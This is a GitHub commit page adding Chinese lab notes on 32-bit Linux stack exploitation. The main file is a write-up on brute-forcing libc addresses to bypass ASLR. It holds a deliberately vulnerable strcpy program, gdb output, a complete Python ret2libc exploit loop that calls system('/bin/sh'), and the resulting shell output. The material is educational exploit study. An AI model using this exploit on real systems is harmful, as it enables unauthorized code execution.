Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 3177a46

Browse files
author
Sn0rt
committed
update: with new post of stack
1 parent b128e14 commit 3177a46

File tree

4 files changed

+961
-0
lines changed

4 files changed

+961
-0
lines changed

‎chapter2/README.md

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,26 @@
11
# 栈的安全
2+
3+
4+
## 基本的漏洞利用
5+
6+
[format strings on linux32](./format-strings.md)
7+
8+
[Integer-overflow on Linux32](./integer-overflow.md)
9+
10+
[off by one on linux32](./off-by-one.md)
11+
12+
## 对抗基于栈上的安全机制
13+
14+
### NX
15+
16+
[ret2libc bypass nx on linux32](./linux-x86-ret2libc.md)
17+
18+
[rop on Linux32](./linux-x86-rop.md)
19+
20+
[rop chain on linux32](./linux-x86-rop-chain.md)
21+
22+
## ASLR
23+
24+
[got overwrite bypass aslr on linux32](./overwrite-got-bypass-aslr.md)
25+
26+
[brute force bypass aslr on linux32](./brute-force-bypass-aslr.md)

‎chapter2/brute-force-bypass-aslr.md

Lines changed: 131 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,131 @@
1+
# 0x00 beginning
2+
3+
记录学暴力破解 32 位 Linux bypass ASLR 的过程, 实验部分来自`sploitfun`[^origin].
4+
5+
>What is brute-force?
6+
7+
在这个技术中攻击者随意选择一个`libc`的基地址来持续攻击直到成功, 这个技术是最简单`bypass`的 ASLR 的方法, 当然需要一定运气.
8+
9+
演示代码如下:
10+
11+
```shell
12+
// gcc -fno-stack-protector
13+
// echo 2 > /proc/sys/kernel/randomize_va_space
14+
15+
#include <stdio.h>
16+
#include <string.h>
17+
18+
int main(int argc, char* argv[]) {
19+
char buf[256];
20+
strcpy(buf,argv[1]);
21+
printf("%s\n",buf);
22+
fflush(stdout);
23+
return 0;
24+
}
25+
```
26+
27+
# 0x01 analysis
28+
29+
当地址随机化开启时候, 发现可以 libc 的每次加载地址都不一样, 但是有规律可循.
30+
31+
```shell
32+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
33+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7580000)
34+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
35+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c5000)
36+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
37+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7612000)
38+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
39+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb753d000)
40+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
41+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7563000)
42+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
43+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755a000)
44+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
45+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb757d000)
46+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
47+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c7000)
48+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
49+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7564000)
50+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
51+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7553000)
52+
```
53+
54+
`libc`随机化只变化 0xb75 后面的两个数字, 因此最大尝试次数 256(2^8) 次时某次随机化的地址总可能又一次被用到, 在下面的`exp`选择`libc`的起始基地址`0xb7595000`进行多次尝试.
55+
56+
# 0x02 how to use?
57+
58+
exp 中 offset 的偏移还是用 peda 套路! offset 是 268.
59+
60+
其中`system_arg`我是利用`libc`中"/bin/sh"相对于`system()`在 libc 中的偏移计算的, 利用 gdb`print`两个然后减法运算就可以, 具体操作如下
61+
62+
```shell
63+
gdb-peda$ p system
64+
1ドル = {<text variable, no debug info>} 0xb7e63190 <__libc_system>
65+
gdb-peda$ searchmem "bin/sh" libc
66+
Searching for 'bin/sh' in: libc ranges
67+
Found 1 results, display max 1 items:
68+
libc : 0xb7f83a25 ("bin/sh")
69+
gdb-peda$ ^Z
70+
[1]+ Stopped gdb -q aslr_2
71+
Sn0rt@warzone:~/lab$ python
72+
Python 2.7.6 (default, Mar 22 2014, 22:59:38)
73+
[GCC 4.8.2] on linux2
74+
Type "help", "copyright", "credits" or "license" for more information.
75+
>>> hex(0xb7f83a25-0xb7e63190)
76+
'0x120895L'
77+
>>>
78+
```
79+
80+
参数填充 exp:
81+
82+
```python
83+
#!/usr/bin/env python
84+
85+
from subprocess import call
86+
from pwn import p32
87+
88+
libc_base_addr = 0xb7595000
89+
exit_offset = 0x000331e0
90+
system_offset = 0x00040190
91+
92+
system_addr = libc_base_addr + system_offset
93+
exit_addr = libc_base_addr + exit_offset
94+
95+
system_arg = system_addr + 0x00120894
96+
97+
payload = "A" * 268 + p32(system_addr) + p32(exit_addr) + p32(system_arg)
98+
99+
i = 0
100+
while (i < 256):
101+
print "Number of tries: %d" %i
102+
ret = call(["./aslr_2", payload])
103+
i += 1
104+
```
105+
其实这里 exp 已经完成了, 不过如果成功过后有点扫尾工作需要做, 把尾部加上
106+
107+
```python
108+
ret = call(["./aslr_2", payload])
109+
i += 1
110+
if (not ret):
111+
break
112+
else:
113+
print "Exploit failed"
114+
```
115+
116+
```shell
117+
...
118+
Number of tries: 79
119+
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�Q]���\�$Zo
120+
$ uid=1042(Sn0rt) gid=1043(Sn0rt) groups=1043(Sn0rt)
121+
$
122+
```
123+
需要多运行几次, 有时候会执行失败, 或者执行成功没有会显示.
124+
125+
# 0x03 doubt
126+
127+
这个技术利用了在同一个`libc`文件中函数偏移是相对的构造出 shellcode, 因此我填写的`libc`基地址又一次命中, 下面攻击就水到渠成, 按照理论这个脚本一次就可以命中`libc`, 为什么需要多次执行才能 get shell?
128+
129+
### reference
130+
131+
[^origin]: [sploitfun](https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-ii/)

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /